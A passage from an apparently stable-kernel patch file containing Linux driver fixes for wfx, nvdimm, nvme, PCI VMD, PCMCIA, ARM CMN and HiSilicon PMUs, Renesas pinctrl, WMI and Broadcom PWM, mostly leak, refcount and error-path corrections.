+-	for (i = 0; i < IEEE80211_TX_MAX_RATES; i++) {
+-		if (rates[i].idx == 0)
+-			break;
+-		if (rates[i].idx == -1) {
+-			rates[i].idx = 0;
+-			rates[i].count = 8; /* == hw->max_rate_tries */
+-			rates[i].flags = rates[i - 1].flags & IEEE80211_TX_RC_MCS;
+-			break;
+-		}
++	if (!has_rate0 && i < IEEE80211_TX_MAX_RATES) {
++		rates[i].idx = 0;
++		rates[i].count = 8; /* == hw->max_rate_tries */
++		rates[i].flags = rates[0].flags & IEEE80211_TX_RC_MCS;
++		i++;
++	}
++	for (; i < IEEE80211_TX_MAX_RATES; i++) {
++		memset(rates + i, 0, sizeof(rates[i]));
++		rates[i].idx = -1;
+ 	}
+-	/* All retries use long GI */
+-	for (i = 1; i < IEEE80211_TX_MAX_RATES; i++)
+-		rates[i].flags &= ~IEEE80211_TX_RC_SHORT_GI;
+ }
+ 
+ static u8 wfx_tx_get_retry_policy_id(struct wfx_vif *wvif, struct ieee80211_tx_info *tx_info)
+diff --git a/drivers/nvdimm/of_pmem.c b/drivers/nvdimm/of_pmem.c
+index 10dbdcdfb9ce9..0243789ba914b 100644
+--- a/drivers/nvdimm/of_pmem.c
++++ b/drivers/nvdimm/of_pmem.c
+@@ -30,7 +30,13 @@ static int of_pmem_region_probe(struct platform_device *pdev)
+ 	if (!priv)
+ 		return -ENOMEM;
+ 
+-	priv->bus_desc.provider_name = kstrdup(pdev->name, GFP_KERNEL);
++	priv->bus_desc.provider_name = devm_kstrdup(&pdev->dev, pdev->name,
++							GFP_KERNEL);
++	if (!priv->bus_desc.provider_name) {
++		kfree(priv);
++		return -ENOMEM;
++	}
++
+ 	priv->bus_desc.module = THIS_MODULE;
+ 	priv->bus_desc.of_node = np;
+ 
+diff --git a/drivers/nvdimm/region_devs.c b/drivers/nvdimm/region_devs.c
+index e0875d3697624..7995f93db2a82 100644
+--- a/drivers/nvdimm/region_devs.c
++++ b/drivers/nvdimm/region_devs.c
+@@ -892,7 +892,8 @@ unsigned int nd_region_acquire_lane(struct nd_region *nd_region)
+ {
+ 	unsigned int cpu, lane;
+ 
+-	cpu = get_cpu();
++	migrate_disable();
++	cpu = smp_processor_id();
+ 	if (nd_region->num_lanes < nr_cpu_ids) {
+ 		struct nd_percpu_lane *ndl_lock, *ndl_count;
+ 
+@@ -911,16 +912,15 @@ EXPORT_SYMBOL(nd_region_acquire_lane);
+ void nd_region_release_lane(struct nd_region *nd_region, unsigned int lane)
+ {
+ 	if (nd_region->num_lanes < nr_cpu_ids) {
+-		unsigned int cpu = get_cpu();
++		unsigned int cpu = smp_processor_id();
+ 		struct nd_percpu_lane *ndl_lock, *ndl_count;
+ 
+ 		ndl_count = per_cpu_ptr(nd_region->lane, cpu);
+ 		ndl_lock = per_cpu_ptr(nd_region->lane, lane);
+ 		if (--ndl_count->count == 0)
+ 			spin_unlock(&ndl_lock->lock);
+-		put_cpu();
+ 	}
+-	put_cpu();
++	migrate_enable();
+ }
+ EXPORT_SYMBOL(nd_region_release_lane);
+ 
+diff --git a/drivers/nvme/host/ioctl.c b/drivers/nvme/host/ioctl.c
+index b33004a4bcb5a..91e6d03475798 100644
+--- a/drivers/nvme/host/ioctl.c
++++ b/drivers/nvme/host/ioctl.c
+@@ -435,10 +435,13 @@ static enum rq_end_io_ret nvme_uring_cmd_end_io(struct request *req,
+ 	void *cookie = READ_ONCE(ioucmd->cookie);
+ 
+ 	req->bio = pdu->bio;
+-	if (nvme_req(req)->flags & NVME_REQ_CANCELLED)
++	if (nvme_req(req)->flags & NVME_REQ_CANCELLED) {
+ 		pdu->nvme_status = -EINTR;
+-	else
++	} else {
+ 		pdu->nvme_status = nvme_req(req)->status;
++		if (!pdu->nvme_status)
++			pdu->nvme_status = blk_status_to_errno(err);
++	}
+ 	pdu->u.result = le64_to_cpu(nvme_req(req)->result.u64);
+ 
+ 	/*
+diff --git a/drivers/pci/controller/vmd.c b/drivers/pci/controller/vmd.c
+index d4c9b888a79d7..5c35884c226e6 100644
+--- a/drivers/pci/controller/vmd.c
++++ b/drivers/pci/controller/vmd.c
+@@ -510,8 +510,7 @@ static void vmd_domain_reset(struct vmd_dev *vmd)
+ 			base = vmd->cfgbar + PCIE_ECAM_OFFSET(bus,
+ 						PCI_DEVFN(dev, 0), 0);
+ 
+-			hdr_type = readb(base + PCI_HEADER_TYPE) &
+-					 PCI_HEADER_TYPE_MASK;
++			hdr_type = readb(base + PCI_HEADER_TYPE);
+ 
+ 			functions = (hdr_type & 0x80) ? 8 : 1;
+ 			for (fn = 0; fn < functions; fn++) {
+diff --git a/drivers/pcmcia/cs.c b/drivers/pcmcia/cs.c
+index f70197154a362..820cce7c8b400 100644
+--- a/drivers/pcmcia/cs.c
++++ b/drivers/pcmcia/cs.c
+@@ -605,6 +605,7 @@ static int pccardd(void *__skt)
+ 		dev_warn(&skt->dev, "PCMCIA: unable to register socket\n");
+ 		skt->thread = NULL;
+ 		complete(&skt->thread_done);
++		put_device(&skt->dev);
+ 		return 0;
+ 	}
+ 	ret = pccard_sysfs_add_socket(&skt->dev);
+diff --git a/drivers/pcmcia/ds.c b/drivers/pcmcia/ds.c
+index ace133b9f7d45..2eb81d9484d27 100644
+--- a/drivers/pcmcia/ds.c
++++ b/drivers/pcmcia/ds.c
+@@ -513,9 +513,6 @@ static struct pcmcia_device *pcmcia_device_add(struct pcmcia_socket *s,
+ 	/* by default don't allow DMA */
+ 	p_dev->dma_mask = 0;
+ 	p_dev->dev.dma_mask = &p_dev->dma_mask;
+-	dev_set_name(&p_dev->dev, "%d.%d", p_dev->socket->sock, p_dev->device_no);
+-	if (!dev_name(&p_dev->dev))
+-		goto err_free;
+ 	p_dev->devname = kasprintf(GFP_KERNEL, "pcmcia%s", dev_name(&p_dev->dev));
+ 	if (!p_dev->devname)
+ 		goto err_free;
+@@ -573,8 +570,15 @@ static struct pcmcia_device *pcmcia_device_add(struct pcmcia_socket *s,
+ 
+ 	pcmcia_device_query(p_dev);
+ 
+-	if (device_register(&p_dev->dev))
+-		goto err_unreg;
++	dev_set_name(&p_dev->dev, "%d.%d", p_dev->socket->sock, p_dev->device_no);
++	if (device_register(&p_dev->dev)) {
++		mutex_lock(&s->ops_mutex);
++		list_del(&p_dev->socket_device_list);
++		s->device_count--;
++		mutex_unlock(&s->ops_mutex);
++		put_device(&p_dev->dev);
++		return NULL;
++	}
+ 
+ 	return p_dev;
+ 
+diff --git a/drivers/perf/arm-cmn.c b/drivers/perf/arm-cmn.c
+index cfb36adf4eb80..47e7c3206939f 100644
+--- a/drivers/perf/arm-cmn.c
++++ b/drivers/perf/arm-cmn.c
+@@ -44,8 +44,11 @@
+ #define CMN_MAX_DTMS			(CMN_MAX_XPS + (CMN_MAX_DIMENSION - 1) * 4)
+ 
+ /* The CFG node has various info besides the discovery tree */
+-#define CMN_CFGM_PERIPH_ID_2		0x0010
+-#define CMN_CFGM_PID2_REVISION		GENMASK(7, 4)
++#define CMN_CFGM_PERIPH_ID_01		0x0008
++#define CMN_CFGM_PID0_PART_0		GENMASK_ULL(7, 0)
++#define CMN_CFGM_PID1_PART_1		GENMASK_ULL(35, 32)
++#define CMN_CFGM_PERIPH_ID_23		0x0010
++#define CMN_CFGM_PID2_REVISION		GENMASK_ULL(7, 4)
+ 
+ #define CMN_CFGM_INFO_GLOBAL		0x900
+ #define CMN_INFO_MULTIPLE_DTM_EN	BIT_ULL(63)
+@@ -107,7 +110,9 @@
+ 
+ #define CMN_DTM_PMEVCNTSR		0x240
+ 
+-#define CMN_DTM_UNIT_INFO		0x0910
++#define CMN650_DTM_UNIT_INFO		0x0910
++#define CMN_DTM_UNIT_INFO		0x0960
++#define CMN_DTM_UNIT_INFO_DTC_DOMAIN	GENMASK_ULL(1, 0)
+ 
+ #define CMN_DTM_NUM_COUNTERS		4
+ /* Want more local counters? Why not replicate the whole DTM! Ugh... */
+@@ -186,6 +191,7 @@
+ #define CMN_WP_DOWN			2
+ 
+ 
++/* Internal values for encoding event support */
+ enum cmn_model {
+ 	CMN600 = 1,
+ 	CMN650 = 2,
+@@ -197,26 +203,34 @@ enum cmn_model {
+ 	CMN_650ON = CMN650 | CMN700,
+ };
+ 
++/* Actual part numbers and revision IDs defined by the hardware */
++enum cmn_part {
++	PART_CMN600 = 0x434,
++	PART_CMN650 = 0x436,
++	PART_CMN700 = 0x43c,
++	PART_CI700 = 0x43a,
++};
++
+ /* CMN-600 r0px shouldn't exist in silicon, thankfully */
+ enum cmn_revision {
+-	CMN600_R1P0,
+-	CMN600_R1P1,
+-	CMN600_R1P2,
+-	CMN600_R1P3,
+-	CMN600_R2P0,
+-	CMN600_R3P0,
+-	CMN600_R3P1,
+-	CMN650_R0P0 = 0,
+-	CMN650_R1P0,
+-	CMN650_R1P1,
+-	CMN650_R2P0,
+-	CMN650_R1P2,
+-	CMN700_R0P0 = 0,
+-	CMN700_R1P0,
+-	CMN700_R2P0,
+-	CI700_R0P0 = 0,
+-	CI700_R1P0,
+-	CI700_R2P0,
++	REV_CMN600_R1P0,
++	REV_CMN600_R1P1,
++	REV_CMN600_R1P2,
++	REV_CMN600_R1P3,
++	REV_CMN600_R2P0,
++	REV_CMN600_R3P0,
++	REV_CMN600_R3P1,
++	REV_CMN650_R0P0 = 0,
++	REV_CMN650_R1P0,
++	REV_CMN650_R1P1,
++	REV_CMN650_R2P0,
++	REV_CMN650_R1P2,
++	REV_CMN700_R0P0 = 0,
++	REV_CMN700_R1P0,
++	REV_CMN700_R2P0,
++	REV_CI700_R0P0 = 0,
++	REV_CI700_R1P0,
++	REV_CI700_R2P0,
+ };
+ 
+ enum cmn_node_type {
+@@ -306,7 +320,7 @@ struct arm_cmn {
+ 	unsigned int state;
+ 
+ 	enum cmn_revision rev;
+-	enum cmn_model model;
++	enum cmn_part part;
+ 	u8 mesh_x;
+ 	u8 mesh_y;
+ 	u16 num_xps;
+@@ -394,19 +408,35 @@ static struct arm_cmn_node *arm_cmn_node(const struct arm_cmn *cmn,
+ 	return NULL;
+ }
+ 
++static enum cmn_model arm_cmn_model(const struct arm_cmn *cmn)
++{
++	switch (cmn->part) {
++	case PART_CMN600:
++		return CMN600;
++	case PART_CMN650:
++		return CMN650;
++	case PART_CMN700:
++		return CMN700;
++	case PART_CI700:
++		return CI700;
++	default:
++		return 0;
++	};
++}
++
+ static u32 arm_cmn_device_connect_info(const struct arm_cmn *cmn,
+ 				       const struct arm_cmn_node *xp, int port)
+ {
+ 	int offset = CMN_MXP__CONNECT_INFO(port);
+ 
+ 	if (port >= 2) {
+-		if (cmn->model & (CMN600 | CMN650))
++		if (cmn->part == PART_CMN600 || cmn->part == PART_CMN650)
+ 			return 0;
+ 		/*
+ 		 * CI-700 may have extra ports, but still has the
+ 		 * mesh_port_connect_info registers in the way.
+ 		 */
+-		if (cmn->model == CI700)
++		if (cmn->part == PART_CI700)
+ 			offset += CI700_CONNECT_INFO_P2_5_OFFSET;
+ 	}
+ 
+@@ -640,7 +670,7 @@ static umode_t arm_cmn_event_attr_is_visible(struct kobject *kobj,
+ 
+ 	eattr = container_of(attr, typeof(*eattr), attr.attr);
+ 
+-	if (!(eattr->model & cmn->model))
++	if (!(eattr->model & arm_cmn_model(cmn)))
+ 		return 0;
+ 
+ 	type = eattr->type;
+@@ -658,7 +688,7 @@ static umode_t arm_cmn_event_attr_is_visible(struct kobject *kobj,
+ 		if ((intf & 4) && !(cmn->ports_used & BIT(intf & 3)))
+ 			return 0;
+ 
+-		if (chan == 4 && cmn->model == CMN600)
++		if (chan == 4 && cmn->part == PART_CMN600)
+ 			return 0;
+ 
+ 		if ((chan == 5 && cmn->rsp_vc_num < 2) ||
+@@ -669,19 +699,19 @@ static umode_t arm_cmn_event_attr_is_visible(struct kobject *kobj,
+ 	}
+ 
+ 	/* Revision-specific differences */
+-	if (cmn->model == CMN600) {
+-		if (cmn->rev < CMN600_R1P3) {
++	if (cmn->part == PART_CMN600) {
++		if (cmn->rev < REV_CMN600_R1P3) {
+ 			if (type == CMN_TYPE_CXRA && eventid > 0x10)
+ 				return 0;
+ 		}
+-		if (cmn->rev < CMN600_R1P2) {
++		if (cmn->rev < REV_CMN600_R1P2) {
+ 			if (type == CMN_TYPE_HNF && eventid == 0x1b)
+ 				return 0;
+ 			if (type == CMN_TYPE_CXRA || type == CMN_TYPE_CXHA)
+ 				return 0;
+ 		}
+-	} else if (cmn->model == CMN650) {
+-		if (cmn->rev < CMN650_R2P0 || cmn->rev == CMN650_R1P2) {
++	} else if (cmn->part == PART_CMN650) {
++		if (cmn->rev < REV_CMN650_R2P0 || cmn->rev == REV_CMN650_R1P2) {
+ 			if (type == CMN_TYPE_HNF && eventid > 0x22)
+ 				return 0;
+ 			if (type == CMN_TYPE_SBSX && eventid == 0x17)
+@@ -689,8 +719,8 @@ static umode_t arm_cmn_event_attr_is_visible(struct kobject *kobj,
+ 			if (type == CMN_TYPE_RNI && eventid > 0x10)
+ 				return 0;
+ 		}
+-	} else if (cmn->model == CMN700) {
+-		if (cmn->rev < CMN700_R2P0) {
++	} else if (cmn->part == PART_CMN700) {
++		if (cmn->rev < REV_CMN700_R2P0) {
+ 			if (type == CMN_TYPE_HNF && eventid > 0x2c)
+ 				return 0;
+ 			if (type == CMN_TYPE_CCHA && eventid > 0x74)
+@@ -698,7 +728,7 @@ static umode_t arm_cmn_event_attr_is_visible(struct kobject *kobj,
+ 			if (type == CMN_TYPE_CCLA && eventid > 0x27)
+ 				return 0;
+ 		}
+-		if (cmn->rev < CMN700_R1P0) {
++		if (cmn->rev < REV_CMN700_R1P0) {
+ 			if (type == CMN_TYPE_HNF && eventid > 0x2b)
+ 				return 0;
+ 		}
+@@ -1200,7 +1230,7 @@ static u32 arm_cmn_wp_config(struct perf_event *event)
+ 	u32 grp = CMN_EVENT_WP_GRP(event);
+ 	u32 exc = CMN_EVENT_WP_EXCLUSIVE(event);
+ 	u32 combine = CMN_EVENT_WP_COMBINE(event);
+-	bool is_cmn600 = to_cmn(event->pmu)->model == CMN600;
++	bool is_cmn600 = to_cmn(event->pmu)->part == PART_CMN600;
+ 
+ 	config = FIELD_PREP(CMN_DTM_WPn_CONFIG_WP_DEV_SEL, dev) |
+ 		 FIELD_PREP(CMN_DTM_WPn_CONFIG_WP_CHN_SEL, chn) |
+@@ -1520,14 +1550,14 @@ done:
+ 	return ret;
+ }
+ 
+-static enum cmn_filter_select arm_cmn_filter_sel(enum cmn_model model,
++static enum cmn_filter_select arm_cmn_filter_sel(const struct arm_cmn *cmn,
+ 						 enum cmn_node_type type,
+ 						 unsigned int eventid)
+ {
+ 	struct arm_cmn_event_attr *e;
+-	int i;
++	enum cmn_model model = arm_cmn_model(cmn);
+ 
+-	for (i = 0; i < ARRAY_SIZE(arm_cmn_event_attrs) - 1; i++) {
++	for (int i = 0; i < ARRAY_SIZE(arm_cmn_event_attrs) - 1; i++) {
+ 		e = container_of(arm_cmn_event_attrs[i], typeof(*e), attr.attr);
+ 		if (e->model & model && e->type == type && e->eventid == eventid)
+ 			return e->fsel;
+@@ -1570,12 +1600,12 @@ static int arm_cmn_event_init(struct perf_event *event)
+ 		/* ...but the DTM may depend on which port we're watching */
+ 		if (cmn->multi_dtm)
+ 			hw->dtm_offset = CMN_EVENT_WP_DEV_SEL(event) / 2;
+-	} else if (type == CMN_TYPE_XP && cmn->model == CMN700) {
++	} else if (type == CMN_TYPE_XP && cmn->part == PART_CMN700) {
+ 		hw->wide_sel = true;
+ 	}
+ 
+ 	/* This is sufficiently annoying to recalculate, so cache it */
+-	hw->filter_sel = arm_cmn_filter_sel(cmn->model, type, eventid);
++	hw->filter_sel = arm_cmn_filter_sel(cmn, type, eventid);
+ 
+ 	bynodeid = CMN_EVENT_BYNODEID(event);
+ 	nodeid = CMN_EVENT_NODEID(event);
+@@ -1966,6 +1996,16 @@ static int arm_cmn_init_dtcs(struct arm_cmn *cmn)
+ 	return 0;
+ }
+ 
++static unsigned int arm_cmn_dtc_domain(struct arm_cmn *cmn, void __iomem *xp_region)
++{
++	int offset = CMN_DTM_UNIT_INFO;
++
++	if (cmn->part == PART_CMN650 || cmn->part == PART_CI700)
++		offset = CMN650_DTM_UNIT_INFO;
++
++	return FIELD_GET(CMN_DTM_UNIT_INFO_DTC_DOMAIN, readl_relaxed(xp_region + offset));
++}
++
+ static void arm_cmn_init_node_info(struct arm_cmn *cmn, u32 offset, struct arm_cmn_node *node)
+ {
+ 	int level;
+@@ -2006,6 +2046,7 @@ static int arm_cmn_discover(struct arm_cmn *cmn, unsigned int rgn_offset)
+ 	void __iomem *cfg_region;
+ 	struct arm_cmn_node cfg, *dn;
+ 	struct arm_cmn_dtm *dtm;
++	enum cmn_part part;
+ 	u16 child_count, child_poff;
+ 	u32 xp_offset[CMN_MAX_XPS];
+ 	u64 reg;
+@@ -2017,7 +2058,19 @@ static int arm_cmn_discover(struct arm_cmn *cmn, unsigned int rgn_offset)
+ 		return -ENODEV;
+ 
+ 	cfg_region = cmn->base + rgn_offset;
+-	reg = readl_relaxed(cfg_region + CMN_CFGM_PERIPH_ID_2);
++
++	reg = readq_relaxed(cfg_region + CMN_CFGM_PERIPH_ID_01);
++	part = FIELD_GET(CMN_CFGM_PID0_PART_0, reg);
++	part |= FIELD_GET(CMN_CFGM_PID1_PART_1, reg) << 8;
++	if (cmn->part && cmn->part != part)
++		dev_warn(cmn->dev,
++			 "Firmware binding mismatch: expected part number 0x%x, found 0x%x\n",
++			 cmn->part, part);
++	cmn->part = part;
++	if (!arm_cmn_model(cmn))
++		dev_warn(cmn->dev, "Unknown part number: 0x%x\n", part);
++
++	reg = readl_relaxed(cfg_region + CMN_CFGM_PERIPH_ID_23);
+ 	cmn->rev = FIELD_GET(CMN_CFGM_PID2_REVISION, reg);
+ 
+ 	reg = readq_relaxed(cfg_region + CMN_CFGM_INFO_GLOBAL);
+@@ -2081,10 +2134,10 @@ static int arm_cmn_discover(struct arm_cmn *cmn, unsigned int rgn_offset)
+ 		if (xp->id == (1 << 3))
+ 			cmn->mesh_x = xp->logid;
+ 
+-		if (cmn->model == CMN600)
++		if (cmn->part == PART_CMN600)
+ 			xp->dtc = 0xf;
+ 		else
+-			xp->dtc = 1 << readl_relaxed(xp_region + CMN_DTM_UNIT_INFO);
++			xp->dtc = 1 << arm_cmn_dtc_domain(cmn, xp_region);
+ 
+ 		xp->dtm = dtm - cmn->dtms;
+ 		arm_cmn_init_dtm(dtm++, xp, 0);
+@@ -2201,7 +2254,7 @@ static int arm_cmn_discover(struct arm_cmn *cmn, unsigned int rgn_offset)
+ 	if (cmn->num_xps == 1)
+ 		dev_warn(cmn->dev, "1x1 config not fully supported, translate XP events manually\n");
+ 
+-	dev_dbg(cmn->dev, "model %d, periph_id_2 revision %d\n", cmn->model, cmn->rev);
++	dev_dbg(cmn->dev, "periph_id part 0x%03x revision %d\n", cmn->part, cmn->rev);
+ 	reg = cmn->ports_used;
+ 	dev_dbg(cmn->dev, "mesh %dx%d, ID width %d, ports %6pbl%s\n",
+ 		cmn->mesh_x, cmn->mesh_y, arm_cmn_xyidbits(cmn), &reg,
+@@ -2256,17 +2309,17 @@ static int arm_cmn_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 
+ 	cmn->dev = &pdev->dev;
+-	cmn->model = (unsigned long)device_get_match_data(cmn->dev);
++	cmn->part = (unsigned long)device_get_match_data(cmn->dev);
+ 	platform_set_drvdata(pdev, cmn);
+ 
+-	if (cmn->model == CMN600 && has_acpi_companion(cmn->dev)) {
++	if (cmn->part == PART_CMN600 && has_acpi_companion(cmn->dev)) {
+ 		rootnode = arm_cmn600_acpi_probe(pdev, cmn);
+ 	} else {
+ 		rootnode = 0;
+ 		cmn->base = devm_platform_ioremap_resource(pdev, 0);
+ 		if (IS_ERR(cmn->base))
+ 			return PTR_ERR(cmn->base);
+-		if (cmn->model == CMN600)
++		if (cmn->part == PART_CMN600)
+ 			rootnode = arm_cmn600_of_probe(pdev->dev.of_node);
+ 	}
+ 	if (rootnode < 0)
+@@ -2335,10 +2388,10 @@ static int arm_cmn_remove(struct platform_device *pdev)
+ 
+ #ifdef CONFIG_OF
+ static const struct of_device_id arm_cmn_of_match[] = {
+-	{ .compatible = "arm,cmn-600", .data = (void *)CMN600 },
+-	{ .compatible = "arm,cmn-650", .data = (void *)CMN650 },
+-	{ .compatible = "arm,cmn-700", .data = (void *)CMN700 },
+-	{ .compatible = "arm,ci-700", .data = (void *)CI700 },
++	{ .compatible = "arm,cmn-600", .data = (void *)PART_CMN600 },
++	{ .compatible = "arm,cmn-650" },
++	{ .compatible = "arm,cmn-700" },
++	{ .compatible = "arm,ci-700" },
+ 	{}
+ };
+ MODULE_DEVICE_TABLE(of, arm_cmn_of_match);
+@@ -2346,9 +2399,9 @@ MODULE_DEVICE_TABLE(of, arm_cmn_of_match);
+ 
+ #ifdef CONFIG_ACPI
+ static const struct acpi_device_id arm_cmn_acpi_match[] = {
+-	{ "ARMHC600", CMN600 },
+-	{ "ARMHC650", CMN650 },
+-	{ "ARMHC700", CMN700 },
++	{ "ARMHC600", PART_CMN600 },
++	{ "ARMHC650" },
++	{ "ARMHC700" },
+ 	{}
+ };
+ MODULE_DEVICE_TABLE(acpi, arm_cmn_acpi_match);
+diff --git a/drivers/perf/hisilicon/hisi_pcie_pmu.c b/drivers/perf/hisilicon/hisi_pcie_pmu.c
+index b61f1f9aba214..c4c1cd269c577 100644
+--- a/drivers/perf/hisilicon/hisi_pcie_pmu.c
++++ b/drivers/perf/hisilicon/hisi_pcie_pmu.c
+@@ -342,6 +342,10 @@ static int hisi_pcie_pmu_event_init(struct perf_event *event)
+ 	struct hisi_pcie_pmu *pcie_pmu = to_pcie_pmu(event->pmu);
+ 	struct hw_perf_event *hwc = &event->hw;
+ 
++	/* Check the type first before going on, otherwise it's not our event */
++	if (event->attr.type != event->pmu->type)
++		return -ENOENT;
++
+ 	event->cpu = pcie_pmu->on_cpu;
+ 
+ 	if (EXT_COUNTER_IS_USED(hisi_pcie_get_event(event)))
+@@ -349,9 +353,6 @@ static int hisi_pcie_pmu_event_init(struct perf_event *event)
+ 	else
+ 		hwc->event_base = HISI_PCIE_CNT;
+ 
+-	if (event->attr.type != event->pmu->type)
+-		return -ENOENT;
+-
+ 	/* Sampling is not supported. */
+ 	if (is_sampling_event(event) || event->attach_state & PERF_ATTACH_TASK)
+ 		return -EOPNOTSUPP;
+diff --git a/drivers/perf/hisilicon/hisi_uncore_pa_pmu.c b/drivers/perf/hisilicon/hisi_uncore_pa_pmu.c
+index 47d3cc9b6eecd..d385234fa28df 100644
+--- a/drivers/perf/hisilicon/hisi_uncore_pa_pmu.c
++++ b/drivers/perf/hisilicon/hisi_uncore_pa_pmu.c
+@@ -416,8 +416,8 @@ static int hisi_pa_pmu_probe(struct platform_device *pdev)
+ 	ret = perf_pmu_register(&pa_pmu->pmu, name, -1);
+ 	if (ret) {
+ 		dev_err(pa_pmu->dev, "PMU register failed, ret = %d\n", ret);
+-		cpuhp_state_remove_instance(CPUHP_AP_PERF_ARM_HISI_PA_ONLINE,
+-					    &pa_pmu->node);
++		cpuhp_state_remove_instance_nocalls(CPUHP_AP_PERF_ARM_HISI_PA_ONLINE,
++						    &pa_pmu->node);
+ 		return ret;
+ 	}
+ 
+diff --git a/drivers/perf/hisilicon/hisi_uncore_sllc_pmu.c b/drivers/perf/hisilicon/hisi_uncore_sllc_pmu.c
+index b9c79f17230c2..7d363d475deb2 100644
+--- a/drivers/perf/hisilicon/hisi_uncore_sllc_pmu.c
++++ b/drivers/perf/hisilicon/hisi_uncore_sllc_pmu.c
+@@ -450,8 +450,8 @@ static int hisi_sllc_pmu_probe(struct platform_device *pdev)
+ 	ret = perf_pmu_register(&sllc_pmu->pmu, name, -1);
+ 	if (ret) {
+ 		dev_err(sllc_pmu->dev, "PMU register failed, ret = %d\n", ret);
+-		cpuhp_state_remove_instance(CPUHP_AP_PERF_ARM_HISI_SLLC_ONLINE,
+-					    &sllc_pmu->node);
++		cpuhp_state_remove_instance_nocalls(CPUHP_AP_PERF_ARM_HISI_SLLC_ONLINE,
++						    &sllc_pmu->node);
+ 		return ret;
+ 	}
+ 
+diff --git a/drivers/perf/hisilicon/hns3_pmu.c b/drivers/perf/hisilicon/hns3_pmu.c
+index e0457d84af6b3..16869bf5bf4cc 100644
+--- a/drivers/perf/hisilicon/hns3_pmu.c
++++ b/drivers/perf/hisilicon/hns3_pmu.c
+@@ -1556,8 +1556,8 @@ static int hns3_pmu_init_pmu(struct pci_dev *pdev, struct hns3_pmu *hns3_pmu)
+ 	ret = perf_pmu_register(&hns3_pmu->pmu, hns3_pmu->pmu.name, -1);
+ 	if (ret) {
+ 		pci_err(pdev, "failed to register perf PMU, ret = %d.\n", ret);
+-		cpuhp_state_remove_instance(CPUHP_AP_PERF_ARM_HNS3_PMU_ONLINE,
+-					    &hns3_pmu->node);
++		cpuhp_state_remove_instance_nocalls(CPUHP_AP_PERF_ARM_HNS3_PMU_ONLINE,
++						    &hns3_pmu->node);
+ 	}
+ 
+ 	return ret;
+@@ -1568,8 +1568,8 @@ static void hns3_pmu_uninit_pmu(struct pci_dev *pdev)
+ 	struct hns3_pmu *hns3_pmu = pci_get_drvdata(pdev);
+ 
+ 	perf_pmu_unregister(&hns3_pmu->pmu);
+-	cpuhp_state_remove_instance(CPUHP_AP_PERF_ARM_HNS3_PMU_ONLINE,
+-				    &hns3_pmu->node);
++	cpuhp_state_remove_instance_nocalls(CPUHP_AP_PERF_ARM_HNS3_PMU_ONLINE,
++					    &hns3_pmu->node);
+ }
+ 
+ static int hns3_pmu_init_dev(struct pci_dev *pdev)
+diff --git a/drivers/pinctrl/renesas/pinctrl-rzg2l.c b/drivers/pinctrl/renesas/pinctrl-rzg2l.c
+index 2a617832a7e60..159812fe1c97c 100644
+--- a/drivers/pinctrl/renesas/pinctrl-rzg2l.c
++++ b/drivers/pinctrl/renesas/pinctrl-rzg2l.c
+@@ -1173,6 +1173,8 @@ static void rzg2l_gpio_irq_disable(struct irq_data *d)
+ 	u32 port;
+ 	u8 bit;
+ 
++	irq_chip_disable_parent(d);
++
+ 	port = RZG2L_PIN_ID_TO_PORT(hwirq);
+ 	bit = RZG2L_PIN_ID_TO_PIN(hwirq);
+ 
+@@ -1187,7 +1189,6 @@ static void rzg2l_gpio_irq_disable(struct irq_data *d)
+ 	spin_unlock_irqrestore(&pctrl->lock, flags);
+ 
+ 	gpiochip_disable_irq(gc, hwirq);
+-	irq_chip_disable_parent(d);
+ }
+ 
+ static void rzg2l_gpio_irq_enable(struct irq_data *d)
+diff --git a/drivers/platform/x86/wmi.c b/drivers/platform/x86/wmi.c
+index 2fe6e147785e4..2b79377cc21e2 100644
+--- a/drivers/platform/x86/wmi.c
++++ b/drivers/platform/x86/wmi.c
+@@ -849,21 +849,13 @@ static int wmi_dev_match(struct device *dev, struct device_driver *driver)
+ }
+ static int wmi_char_open(struct inode *inode, struct file *filp)
+ {
+-	const char *driver_name = filp->f_path.dentry->d_iname;
+-	struct wmi_block *wblock;
+-	struct wmi_block *next;
+-
+-	list_for_each_entry_safe(wblock, next, &wmi_block_list, list) {
+-		if (!wblock->dev.dev.driver)
+-			continue;
+-		if (strcmp(driver_name, wblock->dev.dev.driver->name) == 0) {
+-			filp->private_data = wblock;
+-			break;
+-		}
+-	}
++	/*
++	 * The miscdevice already stores a pointer to itself
++	 * inside filp->private_data.
++	 */
++	struct wmi_block *wblock = container_of(filp->private_data, struct wmi_block, char_dev);
+ 
+-	if (!filp->private_data)
+-		return -ENODEV;
++	filp->private_data = wblock;
+ 
+ 	return nonseekable_open(inode, filp);
+ }
+@@ -1212,8 +1204,8 @@ static int parse_wdg(struct device *wmi_bus_dev, struct acpi_device *device)
+ 	struct wmi_block *wblock, *next;
+ 	union acpi_object *obj;
+ 	acpi_status status;
+-	int retval = 0;
+ 	u32 i, total;
++	int retval;
+ 
+ 	status = acpi_evaluate_object(device->handle, "_WDG", NULL, &out);
+ 	if (ACPI_FAILURE(status))
+@@ -1224,8 +1216,8 @@ static int parse_wdg(struct device *wmi_bus_dev, struct acpi_device *device)
+ 		return -ENXIO;
+ 
+ 	if (obj->type != ACPI_TYPE_BUFFER) {
+-		retval = -ENXIO;
+-		goto out_free_pointer;
++		kfree(obj);
++		return -ENXIO;
+ 	}
+ 
+ 	gblock = (const struct guid_block *)obj->buffer.pointer;
+@@ -1240,8 +1232,8 @@ static int parse_wdg(struct device *wmi_bus_dev, struct acpi_device *device)
+ 
+ 		wblock = kzalloc(sizeof(*wblock), GFP_KERNEL);
+ 		if (!wblock) {
+-			retval = -ENOMEM;
+-			break;
++			dev_err(wmi_bus_dev, "Failed to allocate %pUL\n", &gblock[i].guid);
++			continue;
+ 		}
+ 
+ 		wblock->acpi_device = device;
+@@ -1280,9 +1272,9 @@ static int parse_wdg(struct device *wmi_bus_dev, struct acpi_device *device)
+ 		}
+ 	}
+ 
+-out_free_pointer:
+-	kfree(out.pointer);
+-	return retval;
++	kfree(obj);
++
++	return 0;
+ }
+ 
+ /*
+diff --git a/drivers/pwm/pwm-brcmstb.c b/drivers/pwm/pwm-brcmstb.c
+index 3db3f96edf78d..6afd34d651c77 100644
+--- a/drivers/pwm/pwm-brcmstb.c
++++ b/drivers/pwm/pwm-brcmstb.c
+@@ -290,7 +290,7 @@ static int brcmstb_pwm_suspend(struct device *dev)
+ {
+ 	struct brcmstb_pwm *p = dev_get_drvdata(dev);
+ 
+-	clk_disable(p->clk);
++	clk_disable_unprepare(p->clk);
+ 
+ 	return 0;
+ }
+@@ -299,7 +299,7 @@ static int brcmstb_pwm_resume(struct device *dev)
+ {
+ 	struct brcmstb_pwm *p = dev_get_drvdata(dev);
